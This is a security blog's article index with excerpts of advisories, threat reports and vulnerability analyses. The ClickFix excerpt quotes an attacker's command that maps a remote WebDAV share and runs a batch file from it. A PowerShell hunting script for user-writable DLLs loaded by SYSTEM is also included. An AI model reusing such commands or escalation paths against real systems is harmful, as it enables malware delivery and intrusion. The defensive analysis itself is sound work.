Cyber Shield blogs

Turning threat intelligence into cyber insight

Articles

Apr 21, 2026
  • Advisories

Broken Access Control in Config Endpoint in LiteLLM

An incomplete authorization check in LiteLLM allowed low-privileged attackers to access sensitive data on the host system. CVE-2026-35029

Apr 17, 2026
  • Vulnerabilities

Making Vulnerable Drivers Exploitable Without Hardware - The BYOVD Perspective

Table of contents
  • 1 Introduction
  • 2 The offensive value of kernel mode drivers
  • 3 Device object creation and maintenance - common patterns
  • 3.1 Unconditional creation upon driver load
  • 3.2 Conditional device creation and maintenance
  • 3.3 PnP-specific callbacks as the main location of PnP driver initialization logic
  • 3.3.1 AddDevice
  • 3.3.2 IRP_MJ_PNP
  • 3.4 Active hardware interaction and probing
  • 3.4.1 Neutral hardware use
  • 3.4.2 Vulnerable hardware use
  • 3.4.3 Hardware gating
  • 4 How driver deployment can be approached from the BYOVD perspective
  • 4.1 Simple sc.exe deployment
  • 4.2 Creating software-emulated devices with spoofed hardware ID
  • 4.2.1 The idea
  • 4.2.2 Initial test results
  • 4.2.3 Creating software-emulated devices with SoftwareDevice and PnpManager
  • 4.2.3.1 SetupAPI and PnpManager - process overview
  • 4.2.3.2 SetupAPI and PnpManager - device node creation only
  • 4.2.3.3 SetupAPI and PnpManager - complete and successful deployment
  • 4.2.3.4 Software Device API
  • 4.3 Jumping device stacks
  • 4.3.1 Filter restacking
  • 4.3.2 Per-device and per-class filters
  • 4.4 Forced driver replacement
  • 4

Apr 15, 2026
  • Advisories

Exposed Private Key of X.509 Certificate in SAP HANA Cockpit & SAP HANA Database Explorer

SAP HANA Cockpit users with access to the Database Explorer could retrieve the private keys of X.509 certificates. This could be used to impersonate the application server at the network level, allowing an attacker to obtain user credentials or other sensitive data. The software patch provided by SAP does not suffice to completely mitigate the security risk. The affected X.509 certificates and corresponding private keys need to be revoked and rotated manually. CVE-2026-34262

Apr 14, 2026
  • Advisories

Improper Enforcement of Locked Accounts in WebUI (SSO) in Kiuwan SAST on-premise (KOP) & cloud/SaaS

Kiuwan SAST did not properly enforce the configuration of locked accounts and allowed a login to the WebUI through SSO authentication, even though the locally mapped Kiuwan account was disabled. CVE-2026-24069

Apr 14, 2026
  • Cyber threats

EtherRAT Distribution Spoofing Administrative Tools via GitHub Facades

Introduction

A sophisticated, high-resilience malicious campaign was identified by Atos Threat Research Center (TRC) in March 2026. This operation specifically targets the high-privilege professional accounts of enterprise administrators, DevOps engineers and security analysts by impersonating administrative utilities they rely on for daily operations. By combining Search Engine Optimization (SEO) poisoning, a dual-stage GitHub distribution architecture and decentralized, blockchain-based command-and-control (C2) resolution, the threat actors have established a highly resilient delivery and persistence mechanism.

Creative Distribution via GitHub Facades

The campaign utilizes a multi-layered delivery chain designed to evade platform-level takedowns and maintain a high search engine ranking. The attack begins with SEO poisoning on various search engines, including Bing, Yahoo, DuckDuckGo and Yandex. This ensures that malicious results for niche IT terms rank at the top of search results. Users are initially directed to a primary "facade" GitHub repository. These repositories are optimized for SEO but contain no malicious code - just a professional-looking README file. To maintain operational flexibility, the README contains a link directing the victim to a second, hidden GitHub repository, which serves as the true distribution point for the malware. By separating the

Apr 1, 2026
  • Advisories

Broken Access Control in Open WebUI

An incomplete authorization check in Open WebUI allowed low-privileged attackers to access sensitive tool data. CVE-2026-34222

Mar 30, 2026
  • Cyber threats

Anatomy of access: Windows device objects from a security perspective

Table of contents
  • 1 Introduction
  • 2 Device objects as the most viable kernel attack vector
  • 3 Accessing device objects
  • 3.1 Standard pattern
  • 3.2 Accessing device objects via symlinks versus directly
  • 3.3 Desired access zero
  • 3.4 Named vs unnamed devices
  • 3.5 Control devices vs PnP devices
  • 3.6 Device stacks
  • 3.6.1 IRP travel
  • 3.6.2 Inspecting device stacks
  • 3.6.3 Attacking drivers via device stacks
  • 3.6.4 Security descriptors of unnamed device objects
  • 3.6.5 Security descriptors and device stacks
  • 3.6.6 Multiple named devices in a single device stack
  • 3.6.7 Filters as access control
  • 3.7 Multiple device objects equal multiple entry points
  • 3.7.1 Multidevice WDM drivers
  • 3.7.2 Multidevice WDF (KMDF) drivers
  • 3.8 FILE_DEVICE_SECURE_OPEN
  • 4 Bonus - device mapper tool

1. Introduction

This article was not initially intended to be published as a standalone piece. It started as an introduction to a different article I am currently working on, but eventually it grew to the point where I decided to make it an article of its own. It provides extensive, up-to-date

Mar 26, 2026
  • Cyber threats

The Invisible Danger of Exposed QR Codes and Account Recovery Artifacts

Summary

Too often, second-factor authentication QR codes are treated like harmless pictures: stored by users as backups, screenshotted and forgotten, as if they posed no risk. When they leak, attackers can turn multi-factor protections into single-factor access. This research examines real incidents and common attack paths (screenshots, cloud backups, duplicate enrollments) and recommends practical mitigations that strengthen device-bound provisioning without breaking usability.

2FA and its cons

Although TOTP-based 2FA is widely deployed to mitigate credential theft, its security rests on the assumption that the shared secret provisioned to the user remains confidential. In real-world settings that assumption is fragile. Provisioned QR codes are frequently captured in screenshots, forwarded by email, or retained in cloud backups. Combined with the lack of automated secret rotation and the common inability of systems to detect or block duplicate enrollments, this creates a persistent and exploitable attack surface.

[Figure 1: Example flow of standard TOTP-based authentication]
[Figure 2: Example flow of standard TOTP-based authentication]

The incidents described clearly show how these weaknesses can be leveraged to bypass MFA and undermine trust in a commonly used

Mar 23, 2026
  • Advisories

Local Privilege Escalation in Vienna Assistant (MacOS) - Vienna Symphonic Library

The Vienna Symphonic Library - Vienna Assistant software for MacOS uses a privileged helper to perform privileged actions. The NSXPC listener of the privileged helper does not perform any client validation, leading to privilege escalation. CVE-2026-24068

Mar 18, 2026
  • Advisories

Multiple Privilege Escalation Vulnerabilities in Arturia Software Center MacOS

The Arturia Software Center was found to be vulnerable to local privilege escalation via multiple vectors. The privileged helper used by Arturia Software Center via XPC does not perform client validation. When installing a plugin, a world-writable uninstall shell script is installed, which is executed by root when uninstalling. The vendor was unresponsive and no patch is available. CVE-2026-24062, CVE-2026-24063

Mar 17, 2026
  • Advisories

Multiple vulnerabilities in PEGA Infinity platform

An attacker could distinguish between valid and invalid usernames based on the server's response time, which can be used for username enumeration in the PEGA Infinity platform. Weak brute-force protection enabled password spraying attacks, in which the same password is tested against many different usernames, potentially granting unauthorized access to user accounts. Additionally, an Insecure Direct Object Reference (IDOR) vulnerability could be used to read image files of other users without the option to share the images with others having been set. CVE-2025-62181, CVE-2025-9559

Mar 6, 2026
  • Cyber threats

Investigating a new Click-fix variant

Summary

Atos researchers identified a new variant of the popular ClickFix technique, where attackers convince the user to execute a malicious command on their own device through the Win + R shortcut. In this variation, a "net use" command is used to map a network drive from an external server, after which a ".cmd" batch file hosted on that drive is executed. The script downloads a ZIP archive, unpacks it and executes the legitimate WorkFlowy application with modified, malicious logic hidden inside an ".asar" archive. This acts as a C2 beacon and a dropper for the final malware payload.

Attack overview

In this version the initial attack vector is the same as in all the other variants: a web page posing as a captcha mechanism ("happyglamperro"). It prompts the user to open the Run dialog via "Win+R", followed by "Ctrl+V" and "Enter".

[Figure 1: Phishing website 1]
[Figure 2: Phishing website 2]

This executes the following command:

"cmd.exe" /c net use Z: http://94.156.170255/webdav /persistent:no && "Z:\update.cmd" & net use Z: /delete

Typically, at this stage attackers have used PowerShell or mshta to download and execute the next stage of the malware. Here instead we can see that "net use

Mar 8, 2024
  • Cyber threats

Distributed Denial of 2023?

Introduction

Geopolitical events often trigger cyberattacks by state-sponsored Advanced Persistent Threat (APT) groups and hacktivist organizations. Hacktivists usually resort to Distributed Denial of Service (DDoS) attacks worldwide. Therefore, it is essential to analyze the European cyber environment to gain insight into the number of cyberattacks that have been executed, the countries that have been targeted the most, and the groups responsible for the majority of these attacks. This summary is based on data as of December 13, 2023.

Anonymous Sudan (Storm-1359) campaign against Microsoft

In 2023, one of the most significant and widely recognized Distributed Denial of Service (DDoS) attacks was orchestrated by the Anonymous Sudan group against the United States. The primary target of the attack was Microsoft, which was attacked multiple times during the campaign that spanned from June to July. The DDoS attacks carried out by Anonymous Sudan in 2023 resulted in significant disruptions and downtime for services, which could lead to financial losses and reputational damage for the affected companies. The attacks targeted several high-profile US companies, including Microsoft, and were carried out using a range of techniques, including HTTP(S) flood attacks, cache bypass, and

Feb 19, 2024
  • Cyber threats

Domain Spoofing

Introduction

In the dynamic landscape of cybersecurity, domain spoofing has emerged as an intricate and insidious stratagem employed by threat actors to deceive users and compromise sensitive information. This article dissects domain spoofing, delving into its mechanics, potential consequences, and strategies to mitigate this pervasive threat. Domain spoofing, also known as domain impersonation or domain mimicry, is a deceptive practice where threat actors create fraudulent websites or emails that closely mimic legitimate domains. The primary objective is to exploit the trust users place in familiar domains, such as banking sites, social media platforms or corporate email systems.

Mechanisms of domain spoofing

Typosquatting

Typosquatting involves the creation of domains that closely resemble popular websites, exploiting the likelihood of users making typographical errors while entering URLs. Threat actors register these deceptive domains with the intention of capitalizing on the traffic generated by users who mistype or misspell web addresses. For instance, if a user mistakenly types "aots.net" instead of "atos.net", they might be directed to a fraudulent website designed to mimic the appearance of the legitimate site. These imposter websites often employ subtle changes in the domain name, such as swapping letters, adding

Feb 9, 2024
  • Cyber threats

Writeup Drive Hackthebox

The aim of this write-up is to explain how to carry out the enumeration process used in a pentest and the various methods used to gain access to the machine, then escalate privileges. All commands will be explained in detail, as will the choices made. The first step is to launch the scanning phase. To do this, we'll run a simple Nmap scan with the following parameters:
  • -sC: runs the default script set for service information and vulnerability detection.
  • -sV: determines the versions of services running on open ports. This can help identify specific vulnerabilities associated with specific software versions.
  • -p-: scans all 65,535 ports to ensure that none are missed.
Nmap identified two open ports: SSH and HTTP. Our priority will be to explore the HTTP port first. This decision stems from our assessment of the difficulty of the challenge, which clearly indicates the absence of default credentials. Furthermore, the use of brute-force techniques or automated exploits is not considered the appropriate method in this context. Doodle Drive, present on the HTTP port, is a file-sharing service: We don't

Jan 23, 2024
  • Vulnerabilities

Analysis of Ivanti 0-days, CVE-2023-46805 and CVE-2024-21887

Introduction

On January 10, 2024, the cybersecurity organization Volexity reported the active exploitation of two critical zero-day vulnerabilities in Ivanti Connect Secure (ICS) VPN devices. These vulnerabilities, identified as CVE-2023-46805 and CVE-2024-21887, are believed to have been actively exploited by threat actors. The details of these vulnerabilities are as follows:
  • CVE-2023-46805: an authentication bypass issue within the web interface of the gateways. It allows attackers to gain access to restricted areas by bypassing security checks.
  • CVE-2024-21887: a code injection vulnerability that, when exploited, permits attackers to execute arbitrary commands on the affected devices through specially crafted requests.
The simultaneous exploitation of CVE-2023-46805 and CVE-2024-21887 allows remote code execution across all supported versions of the Ivanti Connect Secure (ICS) VPN devices. Volexity's investigations revealed that attackers have used this combination of vulnerabilities to exfiltrate configuration data, alter and retrieve files, and establish reverse tunnels from the Ivanti Connect Secure (ICS) VPN appliances. In response, Ivanti has provided interim mitigation steps for users to implement until permanent patches are released, with the

Jan 10, 2024
  • Cyber threats

From zero to certificate hero. The 5 Steps to a mature Certificate Lifecycle Management

Imagine: your important website, customer portal, service tools, VPN, ... goes down unexpectedly. Everyone is running around stressed to the max. After trying out several things, someone discovers that a certificate has expired. Sounds familiar? You're not alone. Effective Certificate Lifecycle Management is a process many organizations struggle with. According to the 2023 State of Machine Identity Management Report, 77% of the responding organizations said they had at least two significant outages caused by expired certificates in the past 24 months. 62% say they don't know precisely how many certificates they have. Even when they do, renewing certificates is often overlooked, or the people who know how to do it have left the organization or moved on to other assignments, so certificates tend to expire, with outages as a result. Important contingency plans such as revoking and replacing certificates, or even having to replace them en masse, are often overlooked. In addition, responsibilities are often unclear or misassigned to teams that do not have the real means to exercise the responsibilities given, leading to an exercise in futility and frustration in addition to the outages. To reduce

Oct 27, 2023
  • Vulnerabilities

Citrix NetScaler flaw exposing sensitive data

Introduction

On 10 October 2023, Citrix Systems released a security bulletin for one critical and one high-severity vulnerability. The critical vulnerability, identified as CVE-2023-4966, was discovered in Citrix NetScaler ADC and NetScaler Gateway and is categorized as "sensitive information disclosure." This flaw, with a significant CVSS score of 9.4, poses a risk to the security framework of the affected systems.

Key Takeaways

NetScaler ADC and NetScaler Gateway exhibit a critical vulnerability tied to an unauthenticated buffer overflow, identified as CVE-2023-4966. This flaw, causing sensitive information disclosure in certain configurations (Gateway or AAA virtual server), holds a high CVSSv3 score of 9.4, emphasizing its critical nature. A patch addressing this issue is now available, mitigating the risks associated with the unauthenticated buffer overflow. Given the critical severity, this vulnerability is notably concerning, as attackers frequently target Citrix products, which are often deployed within large organizations possessing valuable assets.

Recommendations

Users of NetScaler ADC and NetScaler Gateway are advised to install the relevant updated versions of NetScaler ADC and NetScaler Gateway as soon as possible. No mitigation methods were provided by the vendor.

Technical details

Citrix NetScaler ADC and NetScaler Gateway are affected

Oct 24, 2023
  • Vulnerabilities

Using EDR telemetry for offensive research

About EDR

EDR (Endpoint Detection and Response) is a type of security solution with agents running on endpoints (workstations, servers, etc.). Its first role is the detection of incidents and threats. The second role is response, not only through automatic prevention, but also by giving Blue Teams the ability to perform various actions on endpoints, like downloading samples, dumping memory, or isolating the host from the network. EDRs have become a game changer in the cybersecurity landscape, with their origins dating back about a decade. This article explores the notion of using EDR telemetry as a source of knowledge on software behaviors, and how to query that source to find potential security vulnerabilities.

Telemetry

To monitor systems for threats and malicious activities, EDRs collect a relatively broad set of event information, commonly referred to as EDR telemetry. Those events include, but are not limited to, process creation (and termination), file creation/modification/removal, network connections, registry operations, various system events, etc. In the rest of the article, I refer to them as base events. The exact list of supported base events, their names, properties, and the information they provide varies between vendors. The telemetry from each endpoint is

Sep 12, 2023
  • Vulnerabilities

Downfall Vulnerability (CVE-2022-40982)

Key Takeaways
  • Downfall Vulnerability Scope: The Downfall vulnerability, tracked as CVE-2022-40982, affects multiple Intel microprocessor families from Skylake through Ice Lake, enabling attackers to steal sensitive data, including passwords, encryption keys, and private user data.
  • Technical Mechanism: The vulnerability exploits the gather instruction in Intel processors, leaking the content of the internal vector register file during speculative execution.
  • Exploitation Techniques: Two primary attack techniques, Gather Data Sampling (GDS) and Gather Value Injection (GVI), have been developed. These techniques can compromise data across user-kernel boundaries, processes, virtual machines, and trusted execution environments.
  • Intel's Response: Intel has been aware of the Downfall/GDS vulnerability and has collaborated on the findings. A microcode update has been released to mitigate the issue, and certain newer Intel processor families are not affected.

Recommendations
  • Hardware and Software Updates: Organizations should consider upgrading to CPUs that are not vulnerable to the Downfall attacks and ensure that all software and microcode updates from Intel are promptly applied.
  • Risk Assessment: Evaluate the risk based on Intel's threat assessment and performance analysis. In specific environments, the impact might be minimal, but a thorough assessment is crucial.
  • Implement Software-Based Mitigations: Consider

Jul 3, 2023
  • Vulnerabilities

Roaming and racing to get SYSTEM – CVE-2023-37250

Introduction

In my previous blog post (Creating Persistent Local Privilege Escalation with Temporarily Elevated Legitimate Installers) I mentioned potential local privilege escalation issues based on the pattern of highly privileged processes executing code from files controlled by regular users. One such example that caught my attention was the Windows version of Parsec (150.88.0.0 and earlier), a remote desktop solution owned by Unity Inc. After deployment, there is a component running as a service with NT AUTHORITY/SYSTEM privileges, created from the C:\Program Files\Parsec\parsecd.exe executable (the default installation path). The user-facing component, docked in the system tray and providing the interface, is also started from the same executable, but interactively, by regular users. So, whenever a regular user wants to use Parsec, they create their own instance of parsecd.exe with their own privileges and Medium integrity, while another instance of parsecd.exe is already running as a service with SYSTEM integrity. In the affected version, upon user initialization, both instances load a DLL file named parsecd-150-87d.dll, located in the %APPDATA%\Roaming\Parsec directory of the regular user who initiated the process (e.g. C:\Users\john\AppData\Roaming\Parsec

Jun 20, 2023
  • Incident response

Outlaw APT group - From initial access to crypto mining

Foreword

Eviden Digital Security regularly performs incident response and gathers information on various groups of attackers. In the summer of 2022, a company discovered one of its machines was performing SSH brute-force attempts and scanning ports on external targets. The company contacted Eviden Digital Security to manage the crisis and remediate the incident. The Eviden Incident Response Team gathered information about malicious activities on the victim's machine, which revealed that one of the company's servers had been used to mine Monero with the XMRig cryptominer. The Eviden Incident Response Team attributed the attacks to the Outlaw threat actor with a high level of confidence. Attribution was performed by linking information from Eviden public and private sources to the Indicators of Compromise (IoCs) as well as to the Tactics, Techniques and Procedures (TTPs) observed on the machine. This article describes the results of the investigations conducted on this group, its modus operandi and its attack campaigns.

Threat overview

The Outlaw threat group is a cryptocurrency mining threat actor that was first discovered by TrendMicro researchers in November 2018. The group is believed to originate in Romania, based on the language, tools and infrastructure it

Jun 15, 2023
  • Cyber threats

Insider Threat – What if the Big Bad Wolf was already in?

Insider threat is considered one of the top-10 concerns in cyberspace in 2023. It is as prominent a cause of concern as external attacks. According to the Ponemon Institute, insider threat incidents have risen 44% over the past two years. The cost per incident has also gone up by more than a third, to US$15.38 million. Even worse, over 70% of insider attacks are not publicly reported, and thus we may not have a clear picture of how many of them occur and what damage they cause.

Insiders as a threat

Cyberattacks are initiated and carried out by human beings. Technology is only a tool in their hands. The term insider covers several actors. It refers to employees, organization members, and those to whom the organization has given sensitive information and access, but also to contractors, vendors, custodians, or repair persons. Basically, anyone to whom the organization has given access to sensitive information is considered an insider. The phenomenon of insider threat is twofold. Insiders are considered both non-hostile threat agents (e.g. distracted employees) and hostile ones (e.g. disgruntled employees). The

Jun 6, 2023
  • Cyber threats

CA/Browser Forum S/MIME Certificate Requirements, what is it and what to do about it?

Introduction

Protecting email is an often overlooked but sometimes necessary feature. Email can be encrypted to prevent anyone but the recipient from reading it, and signed to prevent people from altering or forging the content. S/MIME certificates are the way to sign and encrypt email.

The new CA/Browser Forum Requirements

A key standards body when it comes to public certificates is the CA/Browser Forum, which consists of over 50 public CA members and over 10 consumer members, the latter including, among others, the four leading browser suppliers: Apple, Google, Microsoft, and Mozilla. This forum produces requirements for certificates as well as for public CAs, and sometimes for the validation of certificates, that have global adoption. On January 1st, 2023, the forum produced new Baseline Requirements for the Issuance and Management of Publicly-Trusted S/MIME Certificates. The requirements become effective September 1st, 2023 and apply to certificates issued by public PKIs after that date. This is the first set of requirements for this type of certificate written by the CA/Browser Forum. The most important elements in the requirements are the following

Jun 2, 2023
  • Vulnerabilities

Detailed analysis of the Zero-Day vulnerability in MOVEit Transfer

Key Takeaways

A common feature among all exploited devices is a webshell named 'human2.aspx' located in the 'C:\MOVEit Transfer\wwwroot' public HTML folder. Multiple IP addresses have been associated with the attacks, and the attacks reportedly started on May 27th. The exploitation method strongly resembles the mass exploitation of GoAnywhere MFT and Accellion FTA servers in January 2023 and December 2020 respectively. These previous incidents were linked to the Clop ransomware gang, which exploited managed file transfer platforms for data theft and extortion. The threat actor Lace Tempest has been officially linked to the exploitation of a critical flaw in Progress Software's MOVEit Transfer application. Their apparent collaboration with the cl0p ransomware group, as evidenced by ransom notes found on compromised hosts, reinforces the urgent need for users to promptly apply security patches. PoC exploit code for MOVEit Transfer was released by Horizon3. On June 15th, a third vulnerability (CVE-2023-35708) in Progress Software's MOVEit Transfer was found. This vulnerability could allow users to gain elevated rights and potentially unapproved access to the environment. The vulnerability's specific characteristics that enable worming are unknown. In addition

May 17, 2023
  • Cyber threats

Snake Malware

Taken down by the FBI after 20 years of existence

Key Takeaways

In a coordinated operation, the FBI together with other organizations took down the Snake malware's operational infrastructure. Snake malware has been linked with Center 16 of the Russian FSB and has been in use for almost 20 years. It has been used in various targeted operations to collect and extract valuable data and information from government and NATO organizations.

Introduction

Snake is a malware that was originally developed by the FSB (Federal Security Service of the Russian Federation) in late 2003 under the name "Uroburos". Development ended in early 2004 and shortly afterwards it started conducting cyber operations. Snake has been one of the major tools used by Center 16 of the FSB. It has been in use for almost 20 years and the FSB has conducted a vast number of operations with it. Snake is also part of the Turla family toolset used by Russia. Its usage has been detected in 50 countries around the globe since it entered operational use. Targeted countries are in both North and South America, Europe, Africa, Asia, and Australia. Snake operators do not target specific industries, but it is worth mentioning

Apr 28, 2023
  • Incident response

BumbleBee hunting with a Velociraptor

BumbleBee, a malware which is mainly abused by threat actors in data exfiltration and ransomware incidents, was recently analyzed by Angelo Violetti of SEC Defence, the Digital Forensics and Incident Response team of SEC Consult, an Eviden business. During his research, he used several tools and techniques to define ways to detect the presence of BumbleBee on a compromised infrastructure. The various detection opportunities described in the report can help organizations detect an infection in its first stages and, therefore, prevent further malicious activity starting from BumbleBee. The detection opportunities rely on open-source tools (e.g., Velociraptor) and rules (e.g., Yara, Sigma), so they can be used by any company or the wider community.

Introduction

Ransomware attacks, combined with data exfiltration, are one of the most relevant cyber threats for companies worldwide, as reported by the ENISA Threat Landscape 2022. According to NIST's Incident Handling guide, the prevention and detection phases for those types of attacks can be crucial to minimize the potential incident's impacts (e.g., operational, legal, etc.). To gain initial access into a victim's infrastructure, ransomware operators mostly abuse the following techniques: Phishing campaigns

Apr 4, 2023
  • Cyber threats

Cl0p Ransomware Group activity related to data leaks from GoAnywhere MFT

The essentials
  • The threat actor TA505 is deemed a trendsetter for its ever-changing tactics, techniques, and procedures (TTPs).
  • It targets numerous countries, but it omits close allies of Russia.
  • It is known to use quadruple extortion techniques, including targeting executives and contacting customers to add pressure to pay the ransom.
  • The latest campaign saw at least 132 companies breached in some way, with 12 already having their data exposed on the darknet.

Recommendations
  • Create detection rules based on the group's TTPs and IoCs.
  • Block the infrastructure (C2s, domains, hashes) of the operators.
  • Ensure you keep regular backups stored on a remote server.
  • Make sure system services are kept up to date with patches.
  • Regarding the GoAnywhere MFT service: review all administrator users for attacker accounts; update to version 7.1.2 or higher, or alternatively apply the mitigation configuration.

Introduction

Clop is an example of ransomware as a service (RaaS) that is operated by a Russian-speaking group. It was discovered in 2019 after being used by TA505 in a spear phishing campaign. Clop (or Cl0p) is one of the most prolific ransomware families in recent years. It's infamous for compromising

Mar 31, 2023
  • Vulnerabilities

Creating persistent local privilege escalation with temporarily elevated legitimate installers

Creating persistent local privilege escalation with temporarily elevated legitimate installers The interesting case of WinSCP A couple of months ago, while analyzing one of our environments, we noticed instances of the LogonUI.exe process, running as NT AUTHORITY\SYSTEM, loading a DLL file named DragExt64.dll from local user %LOCALAPPDATA%\Programs\WinSCP directories, e.g., C:\Users\bob\AppData\Local\Programs\WinSCP\DragExt64.dll. Since such DLL files are owned by the user (ownership is inherited from the directory by default) but executed as SYSTEM, it was clear that this created a potential vector for local privilege escalation, as simple as replacing the original DLL with a custom one containing arbitrary code. Following up, it turned out that DragExt64.dll is the WinSCP extension responsible for drag & drop support, distributed along with WinSCP. Further investigation revealed that on some systems the file could be found at C:\Program Files (x86)\WinSCP\DragExt64.dll, while on other systems it was located in the local user's %LOCALAPPDATA%\Programs\WinSCP folder, suggesting that the difference came from whether the user chose "Install for all users (recommended)" or "Install for me only" during installation, as demonstrated in the screenshot below: The default and recommended option deploys WinSCP into C:\Program Files (x86)\WinSCP
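The observation above boils down to one check a defender can run on any workstation: is there a DLL under the per-user install location that the user owns or can modify, and is a SYSTEM process loading it? The following PowerShell script is an added hunting example, not code from the original post or from WinSCP. It walks %LOCALAPPDATA%\Programs (the layout the article attributes to "Install for me only"), reports DLLs the current user owns or has write rights on, and cross-checks them against the modules loaded by LogonUI.exe, the process the article saw loading DragExt64.dll. Two assumptions that are not in the article: LogonUI.exe only exists while the logon or lock screen is displayed, and reading its module list requires an elevated shell; when either condition fails the script still lists the writable candidates and marks the loaded-by-SYSTEM column as unknown.

```powershell
# Added hunting example (not from the original post): find user-modifiable DLLs
# in the per-user install location and check whether LogonUI.exe has them loaded.
# Assumptions: %LOCALAPPDATA%\Programs is the per-user install root (as in the
# article); LogonUI.exe may not be running; module enumeration needs elevation.

$ErrorActionPreference = 'Stop'

$identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
# SIDs that count as "us": the user SID plus every group in the token.
$script:MySids = @($identity.User) + @($identity.Groups)

# Rights that let the holder replace the DLL's contents or re-grant write access.
$script:ModifyRights = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'

function Test-UserModifiableFile {
    # Returns a short reason string if the current user can alter $Path, else $null.
    param([Parameter(Mandatory)][string]$Path)

    $acl   = Get-Acl -LiteralPath $Path
    $owner = $acl.GetOwner([System.Security.Principal.SecurityIdentifier])

    # Ownership alone is enough: an owner can always rewrite the DACL.
    if ($script:MySids -contains $owner) { return "owned by $($acl.Owner)" }

    # Deny ACEs are deliberately ignored: this is a hunting script, and a false
    # positive is cheaper than a missed user-writable DLL.
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne [System.Security.AccessControl.AccessControlType]::Allow) { continue }
        try {
            $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier])
        } catch { continue }   # unresolvable identity, skip it
        if (($script:MySids -contains $sid) -and (($ace.FileSystemRights -band $script:ModifyRights) -ne 0)) {
            return "writable via $($ace.IdentityReference) ($($ace.FileSystemRights))"
        }
    }
    return $null
}

function Find-UserModifiableDll {
    param([string]$Root = (Join-Path $env:LOCALAPPDATA 'Programs'))

    if (-not (Test-Path -LiteralPath $Root)) { return @() }
    Get-ChildItem -LiteralPath $Root -Recurse -File -Filter '*.dll' -ErrorAction SilentlyContinue |
        ForEach-Object {
            $reason = Test-UserModifiableFile -Path $_.FullName
            if ($reason) {
                [pscustomobject]@{ Path = $_.FullName; Reason = $reason; LoadedByLogonUI = 'unknown' }
            }
        }
}

function Get-LogonUiModules {
    # Module paths of every running LogonUI.exe; $null if not running or not elevated.
    try {
        Get-Process -Name LogonUI -ErrorAction Stop |
            ForEach-Object { $_.Modules } |
            ForEach-Object { $_.FileName }
    } catch {
        Write-Warning "Could not read LogonUI.exe modules (not running, or shell not elevated): $($_.Exception.Message)"
        $null
    }
}

$candidates = @(Find-UserModifiableDll)
$loaded     = Get-LogonUiModules

if ($null -ne $loaded) {
    foreach ($c in $candidates) {
        # -contains on strings is case-insensitive in PowerShell, which suits NTFS paths.
        $c.LoadedByLogonUI = [bool]($loaded -contains $c.Path)
    }
}

$candidates | Sort-Object -Property LoadedByLogonUI -Descending | Format-Table -AutoSize
```

Any row that is both user-modifiable and loaded by LogonUI.exe is the exact situation the article describes; rows that are only user-modifiable are worth a look too, since a different privileged process (an installer, a service, a shell extension host) may load them later. The fix on the defensive side is the one the article points at: install into Program Files, or otherwise make sure nothing running as SYSTEM loads code from a directory the user owns.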

Mar 21, 2023
  • Incident response

SOCCRATES – Automation and Orchestration of Security Operations

SOCCRATES – Automation and Orchestration of Security Operations SOCCRATES (SOC & CSIRT Response to Attacks & Threats) is an EU-funded research and innovation project that brings together some of the best European expertise in the field to develop, implement and evaluate an automated security platform to support SOC analysts. Atos is a leading provider of Managed Detection & Response (MDR) services. The Atos MDR offering is platform-driven, built on AIsaac, our AI platform for cyber analytics and hybrid SecOps. We constantly collaborate on innovations in MDR, and SOCCRATES is an initiative in this direction. This article focuses on the SOCCRATES Orchestrator and Integration Engine, which sits at the core of the SOCCRATES platform and provides the automation and orchestration of security operations needed to respond to the different use cases covered by the project. As introduced in previous articles, there are many challenges that Security Operation Centres (SOCs), Computer Security Incident Response Teams (CSIRTs) and Managed Security Service Providers (MSSPs) must face to offer an efficient and quick response to the growing number of increasingly complex cyber-attacks that organizations are suffering. One of these challenges is to provide support to the

Mar 1, 2023
  • Cyber threats

Are privacy-enhancing technologies the holy grail to privacy?

Are privacy-enhancing technologies the holy grail to privacy? PETs promise to unlock collaborative analysis in a secure way, even on regulated or sensitive data. According to Gartner, by 2025, 60% of large organizations will use one or more privacy-enhancing computation techniques in analytics, business intelligence or cloud computing. Privacy-enhancing technologies (PETs) are on the rise. Let's see why you should have a look at them! PETs bring the missing piece needed to fully comply with data sovereignty regulations. There is growing regulatory pressure around the protection of Personally Identifiable Information (PII) and data sovereignty (e.g. cross-border data transfers to cloud operators), with the difficult exercise for authorities of balancing the latitude to exploit personal data (social and economic benefits) against re-identification risk, or of enabling the economic benefits of the cloud while ensuring data sovereignty or IP protection. This is where PETs bring their innovation. From the data sovereignty perspective, the emerging set of privacy-enhancing techniques shifts the paradigm. While data encryption at rest and in transit was already efficiently addressed by existing encryption technologies, protection of data in use was the missing piece of the triptych, meaning that data needed

Feb 15, 2023
  • Incident response

How to build an agile SOC?

How to build an agile SOC? Companies are spending more than ever to protect their digital assets. Gartner predicts that worldwide spending on information security and risk management products and services will hit $188.3 billion in 2023 and is projected to reach $260 billion by 2026. Yet cybersecurity incidents continue to grow. The global cost of cybercrime is increasing by 15% year-over-year and is expected to reach $10.5 trillion by 2025. Last year alone, 4,100 publicly disclosed breaches occurred, exposing 22 billion records and data from tens of millions of people. Simply spending more on security is not enough to stop attacks. This article explores why accelerating your detection and response capabilities is the key to stopping incidents before they cause harm. Asymmetry in cybersecurity Cyber security is fundamentally an asymmetric problem: the defender needs many times the resources of an attacker. It is a common adage that while the defender has to protect thousands of weaknesses, an attacker needs to find and exploit just one. To solve this problem, the dominant paradigm of the last decade was layered security, where more and more security products were installed to create a "defense-in-depth

Feb 8, 2023
  • Incident response

AI-based detections in SOC

AI-based detections in SOC We are currently experiencing the 4th Industrial Revolution (4IR). If adoption of digital technology was the defining feature of the 3rd Industrial Revolution, then interconnection between these technologies, as well as between technologies and humans, is one of the defining factors of the 4th Industrial Revolution. 4IR has us witnessing technology advancement at an unprecedented pace, blurring the lines between the digital and physical worlds, so much so that it has been termed the 'imagination age'. However, at least as far as cyber security is concerned, this is a double-edged sword, as these very advancements also help cyber threat actors. Cyber-attacks are evolving at a rapid pace, and threat actors have started focusing on Internet of Things (IoT) and Operational Technology (OT) in addition to targeting traditional IT infrastructure. So, how does one protect oneself from these evolving threats? The answer lies in a blend of experienced analysts and threat detections driven by Artificial Intelligence (AI). There is a lot of talk about the use of AI. But the million-dollar question everyone is asking is: does AI really help improve my cybersecurity detections? However, before we start talking about whether AI can

Jan 18, 2023
  • Vulnerabilities

Attacking local self-protection mechanisms – a case study of CVE-2019-3613 and CVE-2022-3859

